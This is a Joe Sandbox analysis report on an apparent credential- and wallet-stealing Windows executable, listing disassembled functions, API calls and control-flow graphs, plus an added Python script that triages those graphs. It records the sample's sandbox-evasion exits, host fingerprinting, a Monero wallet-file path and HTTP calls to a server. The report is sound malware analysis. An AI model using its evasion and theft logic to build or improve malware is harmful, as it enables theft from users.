                              • Part of subcall function 006951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695228
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 006952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695318
                              • Part of subcall function 006952C0: lstrlen.KERNEL32(00000000), ref: 0069532F
                              • Part of subcall function 006952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00695364
                              • Part of subcall function 006952C0: lstrlen.KERNEL32(00000000), ref: 00695383
                              • Part of subcall function 006952C0: lstrlen.KERNEL32(00000000), ref: 006953AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0069578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00695A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 8e11155d94b10eabb3d44939b2d00956f17c7eadaddf05eb5f87ba749bed25df
                            • Instruction ID: cfc8ece2cffd31d26b3e5dbe0e4796384bbf37e3e962b825b63d9111d0cb924e
                            • Opcode Fuzzy Hash: 8e11155d94b10eabb3d44939b2d00956f17c7eadaddf05eb5f87ba749bed25df
                            • Instruction Fuzzy Hash: D1E12E719101089ACF58FBE0DD56EED73BEAB54300F50812CB50766991EF346A0ACBDA

                            Control-flow Graph

                            control_flow_graph 1301 6917a0-6917cd call 69aad0 StrCmpCA 1304 6917cf-6917d1 ExitProcess 1301->1304 1305 6917d7-6917f1 call 69aad0 1301->1305 1309 6917f4-6917f8 1305->1309 1310 6917fe-691811 1309->1310 1311 6919c2-6919cd call 69a800 1309->1311 1313 69199e-6919bd 1310->1313 1314 691817-69181a 1310->1314 1313->1309 1315 691849-691858 call 69a820 1314->1315 1316 6918ad-6918be StrCmpCA 1314->1316 1317 6918cf-6918e0 StrCmpCA 1314->1317 1318 69198f-691999 call 69a820 1314->1318 1319 691821-691830 call 69a820 1314->1319 1320 69185d-69186e StrCmpCA 1314->1320 1321 69187f-691890 StrCmpCA 1314->1321 1322 6918f1-691902 StrCmpCA 1314->1322 1323 691951-691962 StrCmpCA 1314->1323 1324 691970-691981 StrCmpCA 1314->1324 1325 691913-691924 StrCmpCA 1314->1325 1326 691932-691943 StrCmpCA 1314->1326 1327 691835-691844 call 69a820 1314->1327 1315->1313 1342 6918ca 1316->1342 1343 6918c0-6918c3 1316->1343 1344 6918ec 1317->1344 1345 6918e2-6918e5 1317->1345 1318->1313 1319->1313 1338 69187a 1320->1338 1339 691870-691873 1320->1339 1340 69189e-6918a1 1321->1340 1341 691892-69189c 1321->1341 1346 69190e 1322->1346 1347 691904-691907 1322->1347 1329 69196e 1323->1329 1330 691964-691967 1323->1330 1332 69198d 1324->1332 1333 691983-691986 1324->1333 1348 691930 1325->1348 1349 691926-691929 1325->1349 1350 69194f 1326->1350 1351 691945-691948 1326->1351 1327->1313 1329->1313 1330->1329 1332->1313 1333->1332 1338->1313 1339->1338 1355 6918a8 1340->1355 1341->1355 1342->1313 1343->1342 1344->1313 1345->1344 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 006917C5
                            • ExitProcess.KERNEL32 ref: 006917D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: f20ac8277bb0a3f344fb36d9ff9f50ac5b4a755bbbf6c2b363a624725661c3f6
                            • Instruction ID: 50ac3ec36d8acb1aa2c09a694888f07993cd6af777d1873530390686a8a0f24e
                            • Opcode Fuzzy Hash: f20ac8277bb0a3f344fb36d9ff9f50ac5b4a755bbbf6c2b363a624725661c3f6
                            • Instruction Fuzzy Hash: D0513EB5A0420AEFDF04EFA0DA64ABE77BABF45704F204059E4056B740D770E952DB62

                            Control-flow Graph

                            control_flow_graph 1356 697500-69754a GetWindowsDirectoryA 1357 69754c 1356->1357 1358 697553-6975c7 GetVolumeInformationA call 698d00 * 3 1356->1358 1357->1358 1365 6975d8-6975df 1358->1365 1366 6975fc-697617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 6975e1-6975fa call 698d00 1365->1367 1369 697619-697626 call 69a740 1366->1369 1370 697628-697658 wsprintfA call 69a740 1366->1370 1367->1365 1377 69767e-69768e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00697542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0069757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0069760A
                            • wsprintfA.USER32 ref: 00697640
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$j
                            • API String ID: 1544550907-1061487577
                            • Opcode ID: 7482ac05aba658fb4ec23b0a4ec181d9241fa54664e38680b5384cda01aed22b
                            • Instruction ID: 973278ff170cfbe322c18ba6ca48d485ac51b659e5dd64a75b86a32bea6ea52c
                            • Opcode Fuzzy Hash: 7482ac05aba658fb4ec23b0a4ec181d9241fa54664e38680b5384cda01aed22b
                            • Instruction Fuzzy Hash: 9B417CB1D04248ABDF10DF94DC85FEEBBB9BF18704F100199F509A7280DB78AA44CBA5

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A05E8), ref: 006998A1
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A0570), ref: 006998BA
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A0810), ref: 006998D2
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A0828), ref: 006998EA
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A0780), ref: 00699903
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A8A10), ref: 0069991B
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013967A0), ref: 00699933
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,01396980), ref: 0069994C
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A0708), ref: 00699964
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A05B8), ref: 0069997C
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A06D8), ref: 00699995
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A07B0), ref: 006999AD
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013967C0), ref: 006999C5
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A0840), ref: 006999DE
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 006811D0: ExitProcess.KERNEL32 ref: 00681211
                              • Part of subcall function 00681160: GetSystemInfo.KERNEL32(?), ref: 0068116A
                              • Part of subcall function 00681160: ExitProcess.KERNEL32 ref: 0068117E
                              • Part of subcall function 00681110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0068112B
                              • Part of subcall function 00681110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00681132
                              • Part of subcall function 00681110: ExitProcess.KERNEL32 ref: 00681143
                              • Part of subcall function 00681220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0068123E
                              • Part of subcall function 00681220: __aulldiv.LIBCMT ref: 00681258
                              • Part of subcall function 00681220: __aulldiv.LIBCMT ref: 00681266
                              • Part of subcall function 00681220: ExitProcess.KERNEL32 ref: 00681294
                              • Part of subcall function 00696770: GetUserDefaultLangID.KERNEL32 ref: 00696774
                              • Part of subcall function 00681190: ExitProcess.KERNEL32 ref: 006811C6
                              • Part of subcall function 00697850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697880
                              • Part of subcall function 00697850: RtlAllocateHeap.NTDLL(00000000), ref: 00697887
                              • Part of subcall function 00697850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0069789F
                              • Part of subcall function 006978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697910
                              • Part of subcall function 006978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00697917
                              • Part of subcall function 006978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0069792F
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013A8AA0,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00696AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00696AF9
                            • Sleep.KERNEL32(00001770), ref: 00696B04
                            • CloseHandle.KERNEL32(?,00000000,?,013A8AA0,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696B1A
                            • ExitProcess.KERNEL32 ref: 00696B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: 745c9267c832c08cffcdf7ffcf490bf2448e570b142de62ce54f2308fa8e89ae
                            • Instruction ID: 8a88e5bffc9ed59d1d36f04bdf959560f74341457ec5d5fe8cf612b988328366
                            • Opcode Fuzzy Hash: 745c9267c832c08cffcdf7ffcf490bf2448e570b142de62ce54f2308fa8e89ae
                            • Instruction Fuzzy Hash: 4C311A70910208AADF44F7E0DD56AEE77BEBF15740F00461CF202A6581DF705905CBAA

                            Control-flow Graph (blocks from the report's graph export; ids are the IDA Plugin node numbers, "->" lists successor blocks)
                            • 1436: 681220-681247, call 6989b0, GlobalMemoryStatusEx -> 1439, 1440
                            • 1439: 681249-681271, call 69da00 (x2) -> 1442
                            • 1440: 681273-68127a -> 1442
                            • 1442: 681281-681285 -> 1444, 1445
                            • 1444: 68129a-68129d
                            • 1445: 681287 -> 1447, 1448
                            • 1447: 681289-681290 -> 1444, 1448
                            • 1448: 681292-681294, ExitProcess
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0068123E
                            • __aulldiv.LIBCMT ref: 00681258
                            • __aulldiv.LIBCMT ref: 00681266
                            • ExitProcess.KERNEL32 ref: 00681294
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: 6d7a5d875a1c30e75879e893898dec875d45deae6ae5572c5de064726cef8e7e
                            • Instruction ID: ed1a3f6af167de9d9e8255058f6cb231cfea9303e336892257384aa3d2de76ec
                            • Opcode Fuzzy Hash: 6d7a5d875a1c30e75879e893898dec875d45deae6ae5572c5de064726cef8e7e
                            • Instruction Fuzzy Hash: 61014BB0940308AAEF10EBE4CC5AF9EBB7DAB05705F208158E605BA280D67456868799

                            Control-flow Graph (blocks from the report's graph export; ids are the IDA Plugin node numbers, "->" lists successor blocks)
                            • 1450: 696af3 -> 1451
                            • 1451: 696b0a -> 1453, 1454
                            • 1453: 696aba-696ad7, call 69aad0, OpenEventA -> 1459, 1460
                            • 1454: 696b0c-696b22, call 696920, call 695b10, CloseHandle, ExitProcess
                            • 1459: 696ad9-696af1, call 69aad0, CreateEventA -> 1454
                            • 1460: 696af5-696b04, CloseHandle, Sleep -> 1451 (back edge)
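The report exports each function's control-flow graph as one flattened line of block ids, address ranges, annotations and id->id edges (the two graphs above, for the GlobalMemoryStatusEx check and the OpenEventA loop). The Python below is an added example, not part of the report or of Joe Sandbox: it parses that flat form and answers the first triage questions, namely which block is the entry, which blocks end in ExitProcess, which conditional branches decide between continuing and exiting, and whether there is a retry loop. The two sample strings are copied from this page; the "gate" heuristic (a branch whose successors disagree on whether ExitProcess is still reachable) is this example's own definition.

```python
"""Parse the flattened control_flow_graph text a Joe Sandbox function record
exports and answer the triage questions a reverser asks first: which block is
the entry, which blocks end in ExitProcess, which branches decide between
continuing and exiting, and is there a retry loop."""
import re
from dataclasses import dataclass, field

# Constructed input: the two graph strings copied from this report. Node
# numbers are the IDA Plugin block ids, addresses are the block's byte range.
CFG_681220 = (
    "1436 681220-681247 call 6989b0 GlobalMemoryStatusEx 1439 681249-681271 "
    "call 69da00 * 2 1436->1439 1440 681273-68127a 1436->1440 1442 681281-681285 "
    "1439->1442 1440->1442 1444 68129a-68129d 1442->1444 1445 681287 1442->1445 "
    "1447 681289-681290 1445->1447 1448 681292-681294 ExitProcess 1445->1448 "
    "1447->1444 1447->1448")
CFG_696AF3 = (
    "1450 696af3 1451 696b0a 1450->1451 1453 696aba-696ad7 call 69aad0 OpenEventA "
    "1451->1453 1454 696b0c-696b22 call 696920 call 695b10 CloseHandle ExitProcess "
    "1451->1454 1459 696ad9-696af1 call 69aad0 CreateEventA 1453->1459 "
    "1460 696af5-696b04 CloseHandle Sleep 1453->1460 1459->1454 1460->1451")

EDGE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]{5,}(-[0-9a-f]{5,})?$")  # 681287 or 681220-681247


@dataclass
class Block:
    addr: str
    calls: list = field(default_factory=list)  # targets of "call XXXXXX"
    apis: list = field(default_factory=list)   # imported APIs named in the block
    succ: list = field(default_factory=list)   # successor block ids


def parse_cfg(flat: str) -> dict:
    """Tokenise the export: 'ID ADDR annotations...' starts a block, 'A->B' is an edge."""
    toks, blocks, cur, i = flat.split(), {}, None, 0
    while i < len(toks):
        t, nxt = toks[i], toks[i + 1] if i + 1 < len(toks) else ""
        if (m := EDGE.match(t)):
            blocks[int(m.group(1))].succ.append(int(m.group(2)))
        elif NODE_ID.match(t) and ADDR.match(nxt):
            cur = blocks.setdefault(int(t), Block(addr=nxt))
            i += 1
        elif t == "call":
            cur.calls.append(nxt)
            i += 1
        elif t == "*":  # "call X * 2": the same call is made twice in a row
            cur.calls.extend([cur.calls[-1]] * (int(nxt) - 1))
            i += 1
        else:
            cur.apis.append(t)
        i += 1
    return blocks


def reach(blocks: dict, start: int) -> set:
    """Block ids reachable from start through one or more edges (cycle-safe)."""
    seen, stack = set(), list(blocks[start].succ)
    while stack:
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(blocks[n].succ)
    return seen


def summarize(blocks: dict) -> dict:
    preds = {s for b in blocks.values() for s in b.succ}
    entry = min((n for n in blocks if n not in preds), default=min(blocks))
    exits = {n for n, b in blocks.items() if "ExitProcess" in b.apis}
    can_exit = {n: n in exits or bool(reach(blocks, n) & exits) for n in blocks}
    # A gate is a conditional branch whose successors disagree on whether
    # ExitProcess is still reachable: that is where the evasion check decides.
    gates = [n for n, b in blocks.items()
             if len(b.succ) > 1 and len({can_exit[s] for s in b.succ}) > 1]
    loops = [n for n in blocks if n in reach(blocks, n)]  # blocks on a cycle
    addr = lambda ids: [blocks[n].addr for n in sorted(ids)]
    return {"entry": blocks[entry].addr, "exit_blocks": addr(exits),
            "gates": addr(gates), "loop_blocks": addr(loops),
            "apis": sorted({a for b in blocks.values() for a in b.apis})}


if __name__ == "__main__":
    for name, flat in (("681220", CFG_681220), ("696af3", CFG_696AF3)):
        print(name, summarize(parse_cfg(flat)))
```

For the first graph the two gates are 681281-681285 and 681289-681290, the comparisons that follow the two __aulldiv calls on the GlobalMemoryStatusEx result; for the second graph there are no gates but 696b0a, 696aba-696ad7 and 696af5-696b04 form the OpenEventA / CloseHandle / Sleep retry cycle.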
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013A8AA0,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00696AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00696AF9
                            • Sleep.KERNEL32(00001770), ref: 00696B04
                            • CloseHandle.KERNEL32(?,00000000,?,013A8AA0,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696B1A
                            • ExitProcess.KERNEL32 ref: 00696B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: 464179830521ef39ede81f5e4c1fa1c471822bc1ff69c807afb0e9f8edaff896
                            • Instruction ID: 8c01fd588db536af2437734a59a8990f06b9cad218f2416c73ffa25e9cda55a6
                            • Opcode Fuzzy Hash: 464179830521ef39ede81f5e4c1fa1c471822bc1ff69c807afb0e9f8edaff896
                            • Instruction Fuzzy Hash: B3F0B830A0030EABEF00ABA0CC0AFBE7B7EFB04304F104519B903A19C4DBB05501DAAA

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: ad05a9795237afdc4befd08f19ee5c6f4566c7f39a96efd7fd5b3e51b8910a2e
                            • Instruction ID: b1879bff9c4b2e5f4b288045539ce5b20c4d16a34172301aa806dca4462de24d
                            • Opcode Fuzzy Hash: ad05a9795237afdc4befd08f19ee5c6f4566c7f39a96efd7fd5b3e51b8910a2e
                            • Instruction Fuzzy Hash: CB216FB1D00208ABDF14DFA4EC45ADE7B79FB04320F108629F915A72D0EB706A0ACF81

                            APIs
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 00686280: InternetOpenA.WININET(006A0DFE,00000001,00000000,00000000,00000000), ref: 006862E1
                              • Part of subcall function 00686280: StrCmpCA.SHLWAPI(?,013AE3F0), ref: 00686303
                              • Part of subcall function 00686280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686335
                              • Part of subcall function 00686280: HttpOpenRequestA.WININET(00000000,GET,?,013ADE28,00000000,00000000,00400100,00000000), ref: 00686385
                              • Part of subcall function 00686280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006863BF
                              • Part of subcall function 00686280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006863D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695228
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 20b89c8e7a1f5d4ece60ea0392f5c8ab62da7304406b28107d746b8ff5ddd64c
                            • Instruction ID: 5d5b572b2cc3f9ce8dcfdae00ede409e2a9a880bed4d0adc3af13e6d498735ff
                            • Opcode Fuzzy Hash: 20b89c8e7a1f5d4ece60ea0392f5c8ab62da7304406b28107d746b8ff5ddd64c
                            • Instruction Fuzzy Hash: C011DD70910148A7CF54FBA4DD52AED73BEAF50340F40416CF81A5A992EF30AB06CB9A
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00697917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0069792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 6586e228a00279567a4fbc1d0b2926f1cefbe968649b0d427b019af112e60f48
                            • Instruction ID: 84f4f5950590af3fcd62e06a685c13f3f40b7809882887ca3e791feb8998aad7
                            • Opcode Fuzzy Hash: 6586e228a00279567a4fbc1d0b2926f1cefbe968649b0d427b019af112e60f48
                            • Instruction Fuzzy Hash: 8B0181B1A04208EBDB04DF98DD45FAABBBCFB04B25F10422AFA45E3680C37559008BA1
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0068112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00681132
                            • ExitProcess.KERNEL32 ref: 00681143
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: b229a3b711e7f73f336dd37ba60da7b43cfafe9f9a87eda4e30a2dff09c6f120
                            • Instruction ID: e32114407423f649bf08dcfb2e3fab7e1f295102d62e347a80f8e7a46b24d2ce
                            • Opcode Fuzzy Hash: b229a3b711e7f73f336dd37ba60da7b43cfafe9f9a87eda4e30a2dff09c6f120
                            • Instruction Fuzzy Hash: B9E0E67094530CFBE7546BA09C0EF49767CFB05B05F104154F7097A5D0D6B52A419799
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006810B3
